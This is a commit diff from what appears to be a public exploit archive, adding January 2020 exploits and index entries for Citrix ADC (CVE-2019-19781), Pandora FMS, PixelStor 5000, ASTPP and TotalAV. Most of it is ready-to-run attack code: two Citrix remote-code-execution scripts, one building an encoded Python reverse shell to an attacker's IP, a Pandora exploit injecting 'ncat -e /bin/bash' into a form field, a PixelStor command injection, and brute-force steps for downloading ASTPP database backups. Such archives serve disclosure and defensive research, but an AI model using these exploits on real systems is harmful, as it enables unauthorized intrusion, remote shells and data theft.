DB: 2020-01-11
6 changes to exploits/shellcodes TotalAV 2020 4.14.31 - Privilege Escalation Pandora 7.0NG - Remote Code Execution PixelStor 5000 K:4.0.1580-20150629 - Remote Code Execution ASTPP 4.0.1 VoIP Billing - Database Backup Download Citrix Application Delivery Controller and Citrix Gateway - Remote Code Execution (PoC) Citrix Application Delivery Controller and Citrix Gateway - Remote Code Execution
This commit is contained in:
parent
de1e6651e0
commit
d3ca859971
7 changed files with 358 additions and 0 deletions
56
exploits/linux/webapps/47900.txt
Normal file
56
exploits/linux/webapps/47900.txt
Normal file
|
@ -0,0 +1,56 @@
|
|||
# Exploit Title: ASTPP 4.0.1 VoIP Billing - Database Backup Download
|
||||
# Date: 2019-11-18
|
||||
# Exploit Author: Fabien AUNAY
|
||||
# Vendor Homepage: https://www.astppbilling.org/
|
||||
# Software Link: https://github.com/iNextrix/ASTPP/tree/v4.0.1
|
||||
# Version: 4.0.1 vendor default setup script
|
||||
# Tested on: Debian 9 - CentOS 7
|
||||
# CVE : -
|
||||
|
||||
###########################################################################################################
|
||||
ASTPP 4.0.1 VoIP Billing Unauthenticated Predictable database backup download
|
||||
|
||||
A Smart TelePhony Platform for Individual Business, Wholesale and Residential VoIP Service Providers!
|
||||
It is available as an open source solution. It means without any investment, one can start his telephony
|
||||
business using ASTPP.
|
||||
ASTPP, being one of the most powerful VoIP Billing Software, thrives to benefit its users by providing a
|
||||
comprehensive telephony solution. This open source solution has lifted itself up from a mere VoIP billing
|
||||
solution to “A Smart TelePhony Platform”.
|
||||
The latest version of ASTPP is provisioned with some advanced functional modules which are designed
|
||||
to eliminate the need of multiple solutions to run a VoIP business. It has integrated hosted IP PBX, Class
|
||||
4/5 Softswitch, and complete invoicing and billing solution developed by leveraging Smart
|
||||
Technology.
|
||||
|
||||
When administrator performs a ASTPP backup in web interface (Configuration / Database Restore / Create)
|
||||
the file name follows a semi-predictable pattern located in /var/www/html/astpp/database_backup/.
|
||||
|
||||
The file name can be FUZZED for data exfiltration with the following pattern: astpp_20200110080136.sql.gz
|
||||
|
||||
Pattern review:
|
||||
- astpp_
|
||||
- year
|
||||
- month
|
||||
- day
|
||||
- 6 PIN digit
|
||||
|
||||
Steps:
|
||||
Objective 1 : Generate your 6 PIN list
|
||||
Objective 2 : FUZZ the target URL
|
||||
Objective 3 : Download the mysqldump
|
||||
|
||||
###########################################################################################################
|
||||
|
||||
Objective 1: Generate your 6 PIN list
|
||||
POC: crunch 6 6 0123456789 > pin_fuzzer.list
|
||||
|
||||
Objective 2 : FUZZ the target URL
|
||||
POC: wfuzz --hc 302 -w pin_fuzzer.list 'http://127.0.0.1/database_backup/astpp_20200110FUZZ.sql.gz'
|
||||
===================================================================
|
||||
ID Response Lines Word Chars Payload
|
||||
===================================================================
|
||||
|
||||
000080137: 200 1135 L 6859 W 550239 Ch "080136"
|
||||
|
||||
Objective 3 : Download the mysqldump
|
||||
POC: wget http://127.0.0.1/database_backup/astpp_20200110080136.sql.gz
|
||||
astpp_20200110080136.sql.gz 100%[===============================================================================>] 296,70K 1,05MB/s ds 0,3
|
23
exploits/multiple/webapps/47901.sh
Executable file
23
exploits/multiple/webapps/47901.sh
Executable file
|
@ -0,0 +1,23 @@
|
|||
#!/bin/bash
|
||||
# Remote Code Execution Exploit for Citrix Application Delivery Controller and Citrix Gateway - CVE-2019-19781
|
||||
# Usage : bash CVE-2019-19781.sh IP_OF_VULNURABLE_HOST COMMAND_TO_EXECUTE e.g : bash CVE-2019-19781.sh XX.XX.XX.XX 'uname -a'
|
||||
# Release Date : 11/01/2020
|
||||
# Follow Us : https://twitter.com/ProjectZeroIN / https://github.com/projectzeroindia
|
||||
echo "=================================================================================
|
||||
___ _ _ ____ ___ _ _
|
||||
| _ \ _ _ ___ (_) ___ __ | |_ |_ / ___ _ _ ___ |_ _| _ _ __| |(_) __ _
|
||||
| _/| '_|/ _ \ | |/ -_)/ _|| _| / / / -_)| '_|/ _ \ | | | ' \ / _' || |/ _' |
|
||||
|_| |_| \___/_/ |\___|\__| \__| /___|\___||_| \___/ |___||_||_|\__,_||_|\__,_|
|
||||
|__/ CVE-2019-19781
|
||||
================================================================================="
|
||||
##############################
|
||||
if [ -z "$1" ];
|
||||
then
|
||||
echo -ne 'Usage : bash CVE-2019-19781.sh IP_OF_VULNURABLE_HOST COMMAND_TO_EXECUTE\n'
|
||||
exit;
|
||||
fi
|
||||
filenameid=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 32 | head -n 1);
|
||||
curl -s -k "https://$1/vpn/../vpns/portal/scripts/newbm.pl" -d "url=http://example.com\&title=[%25+template.new({'BLOCK'%3d'exec(\'$2 | tee /netscaler/portal/templates/$filenameid.xml\')%3b'})+%25]\&desc=test\&UI_inuse=RfWeb" -H "NSC_USER: /../../../../../../../../../../netscaler/portal/templates/$filenameid" -H 'NSC_NONCE: test1337' -H 'Content-type: application/x-www-form-urlencoded' --path-as-is
|
||||
echo -ne "\n" ;curl -m 3 -k "https://$1/vpn/../vpns/portal/$filenameid.xml" -s -H "NSC_NONCE: pwnpzi1337" -H "NSC_USER: pwnpzi1337" --path-as-is
|
||||
echo -ne "Command Output :\n"
|
||||
curl -m 3 -k "https://$1/vpn/../vpns/portal/$filenameid.xml" -H "NSC_NONCE: pwnpzi1337" -H "NSC_USER: pwnpzi1337" --path-as-is
|
132
exploits/multiple/webapps/47902.py
Executable file
132
exploits/multiple/webapps/47902.py
Executable file
|
@ -0,0 +1,132 @@
|
|||
#!/usr/bin/python3
|
||||
#
|
||||
# Exploits the Citrix Directory Traversal Bug: CVE-2019-19781
|
||||
#
|
||||
# You only need a listener like netcat to catch the shell.
|
||||
#
|
||||
# Shout out to the team: Rob Simon, Justin Elze, Logan Sampson, Geoff Walton, Christopher Paschen, Kevin Haubris, Scott White
|
||||
#
|
||||
# Tool Written by: Rob Simon and David Kennedy
|
||||
|
||||
import requests
|
||||
import urllib3
|
||||
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # disable warnings
|
||||
import random
|
||||
import string
|
||||
import time
|
||||
from random import randint
|
||||
import argparse
|
||||
import sys
|
||||
|
||||
# random string generator
|
||||
def randomString(stringLength=10):
|
||||
letters = string.ascii_lowercase
|
||||
return ''.join(random.choice(letters) for i in range(stringLength))
|
||||
|
||||
# our random string for filename - will leave artifacts on system
|
||||
filename = randomString()
|
||||
randomuser = randomString()
|
||||
|
||||
# generate random number for the nonce
|
||||
nonce = randint(5, 15)
|
||||
|
||||
# this is our first stage which will write out the file through the Citrix traversal issue and the newbm.pl script
|
||||
# note that the file location will be in /netscaler/portal/templates/filename.xml
|
||||
def stage1(filename, randomuser, nonce, victimip, victimport, attackerip, attackerport):
|
||||
|
||||
# encoding our payload stub for one netcat listener - awesome work here Rob Simon (KC)
|
||||
encoded = ""
|
||||
i=0
|
||||
text = ("""python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("%s",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'""" % (attackerip, attackerport))
|
||||
while i < len(text):
|
||||
encoded = encoded + "chr("+str(ord(text[i]))+") . "
|
||||
i += 1
|
||||
encoded = encoded[:-3]
|
||||
payload="[% template.new({'BLOCK'='print readpipe(" + encoded + ")'})%]"
|
||||
headers = (
|
||||
{
|
||||
'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0',
|
||||
'NSC_USER' : '../../../netscaler/portal/templates/%s' % (filename),
|
||||
'NSC_NONCE' : '%s' % (nonce),
|
||||
})
|
||||
|
||||
data = (
|
||||
{
|
||||
"url" : "127.0.0.1",
|
||||
"title" : payload,
|
||||
"desc" : "desc",
|
||||
"UI_inuse" : "a"
|
||||
})
|
||||
|
||||
url = ("https://%s:%s/vpn/../vpns/portal/scripts/newbm.pl" % (victimip, victimport))
|
||||
requests.post(url, data=data, headers=headers, verify=False)
|
||||
|
||||
# this is our second stage that triggers the exploit for us
|
||||
def stage2(filename, randomuser, nonce, victimip, victimport):
|
||||
headers = (
|
||||
{
|
||||
'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0',
|
||||
'NSC_USER' : '%s' % (randomuser),
|
||||
'NSC_NONCE' : '%s' % (nonce),
|
||||
})
|
||||
|
||||
requests.get("https://%s:%s/vpn/../vpns/portal/%s.xml" % (victimip, victimport, filename), headers=headers, verify=False)
|
||||
|
||||
|
||||
# start our main code to execute
|
||||
print('''
|
||||
|
||||
.o oOOOOOOOo OOOo
|
||||
Ob.OOOOOOOo OOOo. oOOo. .adOOOOOOO
|
||||
OboO"""""""""""".OOo. .oOOOOOo. OOOo.oOOOOOo.."""""""""'OO
|
||||
OOP.oOOOOOOOOOOO "POOOOOOOOOOOo. `"OOOOOOOOOP,OOOOOOOOOOOB'
|
||||
`O'OOOO' `OOOOo"OOOOOOOOOOO` .adOOOOOOOOO"oOOO' `OOOOo
|
||||
.OOOO' `OOOOOOOOOOOOOOOOOOOOOOOOOO' `OO
|
||||
OOOOO '"OOOOOOOOOOOOOOOO"` oOO
|
||||
oOOOOOba. .adOOOOOOOOOOba .adOOOOo.
|
||||
oOOOOOOOOOOOOOba. .adOOOOOOOOOO@^OOOOOOOba. .adOOOOOOOOOOOO
|
||||
OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"` '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO
|
||||
"OOOO" "YOoOOOOMOIONODOO"` . '"OOROAOPOEOOOoOY" "OOO"
|
||||
Y 'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?' :`
|
||||
: .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO? .
|
||||
. oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo
|
||||
'%o OOOO"%OOOO%"%OOOOO"OOOOOO"OOO':
|
||||
`$" `OOOO' `O"Y ' `OOOO' o .
|
||||
. . OP" : o .
|
||||
:
|
||||
|
||||
Citrixmash v0.1 - Exploits the Citrix Directory Traversal Bug: CVE-2019-19781
|
||||
Tool Written by: Rob Simon and Dave Kennedy
|
||||
Contributions: The TrustedSec Team
|
||||
Website: https://www.trustedsec.com
|
||||
INFO: https://www.trustedsec.com/blog/critical-exposure-in-citrix-adc-netscaler-unauthenticated-remote-code-execution/
|
||||
|
||||
This tool exploits a directory traversal bug within Citrix ADC (NetScalers) which calls a perl script that is used
|
||||
to append files in an XML format to the victim machine. This in turn allows for remote code execution.
|
||||
|
||||
Be sure to cleanup these two file locations:
|
||||
/var/tmp/netscaler/portal/templates/
|
||||
/netscaler/portal/templates/
|
||||
|
||||
Usage:
|
||||
|
||||
python citrixmash.py <victimipaddress> <victimport> <attacker_listener> <attacker_port>\n''')
|
||||
|
||||
# parse our commands
|
||||
parser = argparse.ArgumentParser()
|
||||
parser.add_argument("target", help="the vulnerable server with Citrix (defaults https)")
|
||||
parser.add_argument("targetport", help="the target server web port (normally on 443)")
|
||||
parser.add_argument("attackerip", help="the attackers reverse listener IP address")
|
||||
parser.add_argument("attackerport", help="the attackersa reverse listener port")
|
||||
args = parser.parse_args()
|
||||
print("[*] Firing STAGE1 POST request to create the XML template exploit to disk...")
|
||||
print("[*] Saving filename as %s.xml on the victim machine..." % (filename))
|
||||
# trigger our first post
|
||||
stage1(filename, randomuser, nonce, args.target, args.targetport, args.attackerip, args.attackerport)
|
||||
print("[*] Sleeping for 2 seconds to ensure file is written before we call it...")
|
||||
time.sleep(2)
|
||||
print("[*] Triggering GET request for the newly created file with a listener waiting...")
|
||||
print("[*] Shell should now be in your listener... enjoy. Keep this window open..")
|
||||
print("[!] Be sure to cleanup the two locations here (artifacts): /var/tmp/netscaler/portal/templates/, /netscaler/portal/templates/")
|
||||
# trigger our second post
|
||||
stage2(filename, randomuser, nonce, args.target, args.targetport)
|
71
exploits/php/webapps/47898.py
Executable file
71
exploits/php/webapps/47898.py
Executable file
|
@ -0,0 +1,71 @@
|
|||
# Exploit Title: Pandora 7.0NG - Remote Code Execution
|
||||
# Date: 2019-11-14
|
||||
# Exploit Author: Askar (@mohammadaskar2)
|
||||
# CVE: CVE-2019-20224
|
||||
# Vendor Homepage: https://pandorafms.org/
|
||||
# Software link: https://pandorafms.org/features/free-download-monitoring-software/
|
||||
# Version: v7.0NG
|
||||
# Tested on: CentOS 7.3 / PHP 5.4.16
|
||||
|
||||
#!/usr/bin/python3
|
||||
|
||||
import requests
|
||||
import sys
|
||||
|
||||
if len(sys.argv) !=3D 6:
|
||||
print("[+] Usage : ./exploit.py target username password ip port")
|
||||
exit()
|
||||
|
||||
target =3D sys.argv[1]
|
||||
username =3D sys.argv[2]
|
||||
password =3D sys.argv[3]
|
||||
ip =3D sys.argv[4]
|
||||
port =3D int(sys.argv[5])
|
||||
|
||||
request =3D requests.session()
|
||||
|
||||
login_info =3D {
|
||||
"nick": username,
|
||||
"pass": password,
|
||||
"login_button": "Login"
|
||||
}
|
||||
|
||||
login_request =3D request.post(
|
||||
target+"/pandora_console/index.php?login=3D1",
|
||||
login_info,
|
||||
verify=3DFalse,
|
||||
allow_redirects=3DTrue
|
||||
)
|
||||
|
||||
resp =3D login_request.text
|
||||
|
||||
if "User not found in database" in resp:
|
||||
print("[-] Login Failed")
|
||||
exit()
|
||||
else:
|
||||
print("[+] Logged In Successfully")
|
||||
|
||||
print("[+] Sending crafted graph request ..")
|
||||
|
||||
body_request =3D {
|
||||
"date": "0",
|
||||
"time": "0",
|
||||
"period": "0",
|
||||
"interval_length": "0",
|
||||
"chart_type": "netflow_area",
|
||||
"max_aggregates": "1",
|
||||
"address_resolution": "0",
|
||||
"name": "0",
|
||||
"assign_group": "0",
|
||||
"filter_type": "0",
|
||||
"filter_id": "0",
|
||||
"filter_selected": "0",
|
||||
"ip_dst": "0",
|
||||
"ip_src": '";ncat -e /bin/bash {0} {1} #'.format(ip, port),
|
||||
"draw_button": "Draw"
|
||||
}
|
||||
|
||||
draw_url =3D target + "/pandora_console/index.php?sec=3Dnetf&sec2=3Doperati=
|
||||
on/netflow/nf_live_view&pure=3D0"
|
||||
print("[+] Check your netcat ;)")
|
||||
request.post(draw_url, body_request)
|
35
exploits/php/webapps/47899.py
Executable file
35
exploits/php/webapps/47899.py
Executable file
|
@ -0,0 +1,35 @@
|
|||
# Exploit Title: PixelStor 5000 - Remote Code Execution
|
||||
# Product: PixelStor 5000
|
||||
# Vendor: Rasilient
|
||||
# Date: 2020-01-08
|
||||
# Exploit Author: .:UND3R:.
|
||||
# Vendor Homepage: http://rasilient.com
|
||||
# Version: K:4.0.1580-20150629 (KDI Version)
|
||||
# Tested on: K:4.0.1580-20150629 (KDI Version)
|
||||
# CVE: CVE-2020-6756
|
||||
# URL Author: https://pwnedchile.com
|
||||
# Thanks: Dani Pelotocino <3, Roit
|
||||
|
||||
import requests, sys
|
||||
|
||||
def poc(target, cmd):
|
||||
url = target + "/Option/languageOptions.php"
|
||||
headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
|
||||
data = {"lang": ";" + cmd + ";/bin/echo -n en"}
|
||||
r = requests.post(url, headers=headers, data=data)
|
||||
if(r.status_code == 200):
|
||||
print("\nPwned :]")
|
||||
else:
|
||||
print("\nNot vulnerable :(")
|
||||
|
||||
print("PixelStor 5000 RCE exploit\nVersion: K:4.0.1580-20150629 (KDI Version)\n\nAuthor: .:UND3R:.\nURL: https://pwnedchile.com\nThanks: Dani Pelotocino <3")
|
||||
|
||||
if len(sys.argv) !=2:
|
||||
print("\n[+] Usage: python " + sys.argv[0] + " <url>\n")
|
||||
sys.exit(1)
|
||||
|
||||
if __name__ == "__main__":
|
||||
url = sys.argv[1]
|
||||
cmd = raw_input("\n[Linux Command]:")
|
||||
poc(url, cmd)
|
||||
#EoF
|
35
exploits/windows/local/47897.txt
Normal file
35
exploits/windows/local/47897.txt
Normal file
|
@ -0,0 +1,35 @@
|
|||
# Exploit Title: TotalAV 2020 4.14.31 - Privilege Escalation
|
||||
# Date: 2020-01-09
|
||||
# Exploit Author: Kusol Watchara-Apanukorn
|
||||
# Vendor Homepage: https://www.totalav.com/
|
||||
# Version: 4.14.31
|
||||
# Fixed on: 5.3.35
|
||||
# Tested on: Windows 10 x64
|
||||
# CVE : N/A
|
||||
|
||||
# Vulnerability Description:
|
||||
# TotalAV 2020 4.14.31 has quarantine flaw that allows attacker escape of
|
||||
# privilege by using NTFS directory junction.
|
||||
|
||||
**You can download vulnerability version with this link:
|
||||
https://install.protected.net/windows/cdn3/4.14.31/TotalAV_Setup.exe
|
||||
|
||||
///////////////////////////////////
|
||||
Proof of Concept
|
||||
//////////////////////////////////
|
||||
1. Plant the malicious file in this case we use DLL file
|
||||
2. To exploit the vulnerability antivirus must detect the malicious dll
|
||||
3. Move it to quarantine.
|
||||
4. Attacker must create NTFS directory junction to restore
|
||||
|
||||
Full step: https://www.youtube.com/watch?v=88qeaLq98Gc
|
||||
|
||||
|
||||
Vulnerability Disclosure Timeline:
|
||||
==================================
|
||||
17 Oct, 19 : Found Vulnerability
|
||||
18 Oct, 19 : Vendor Notification
|
||||
18 Oct, 19 : Request CVE
|
||||
21 Oct, 19 : Vendor Response
|
||||
mid Dec, 19 : Vendor released new patched (v5.3.35)
|
||||
09 Jan, 20: Vulnerability Disclosure
|
|
@ -10887,6 +10887,7 @@ id,file,description,date,author,type,platform,port
|
|||
47880,exploits/windows/local/47880.cc,"Windows - Shell COM Server Registrar Local Privilege Escalation",2020-01-02,0vercl0k,local,windows,
|
||||
47883,exploits/windows/local/47883.txt,"AnyDesk 5.4.0 - Unquoted Service Path",2020-01-07,SajjadBnd,local,windows,
|
||||
47896,exploits/xml/local/47896.txt,"MSN Password Recovery 1.30 - XML External Entity Injection",2020-01-09,ZwX,local,xml,
|
||||
47897,exploits/windows/local/47897.txt,"TotalAV 2020 4.14.31 - Privilege Escalation",2020-01-10,"Kusol Watchara-Apanukorn",local,windows,
|
||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||
|
@ -42197,3 +42198,8 @@ id,file,description,date,author,type,platform,port
|
|||
47892,exploits/java/webapps/47892.txt,"Tomcat proprietaryEvaluate 9.0.0.M1 - Sandbox Escape",2020-01-08,hantwister,webapps,java,
|
||||
47893,exploits/hardware/webapps/47893.js,"Sony Playstation 4 (PS4) < 6.72 - WebKit Code Execution (PoC)",2019-12-31,"TJ Corley",webapps,hardware,
|
||||
47895,exploits/java/webapps/47895.py,"Oracle Weblogic 10.3.6.0.0 - Remote Command Execution",2020-01-09,james,webapps,java,
|
||||
47898,exploits/php/webapps/47898.py,"Pandora 7.0NG - Remote Code Execution",2020-01-10,Askar,webapps,php,
|
||||
47899,exploits/php/webapps/47899.py,"PixelStor 5000 K:4.0.1580-20150629 - Remote Code Execution",2020-01-10,.:UND3R:.,webapps,php,
|
||||
47900,exploits/linux/webapps/47900.txt,"ASTPP 4.0.1 VoIP Billing - Database Backup Download",2020-01-10,"Fabien AUNAY",webapps,linux,
|
||||
47901,exploits/multiple/webapps/47901.sh,"Citrix Application Delivery Controller and Citrix Gateway - Remote Code Execution (PoC)",2020-01-11,"Project Zero India",webapps,multiple,
|
||||
47902,exploits/multiple/webapps/47902.py,"Citrix Application Delivery Controller and Citrix Gateway - Remote Code Execution",2020-01-11,TrustedSec,webapps,multiple,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue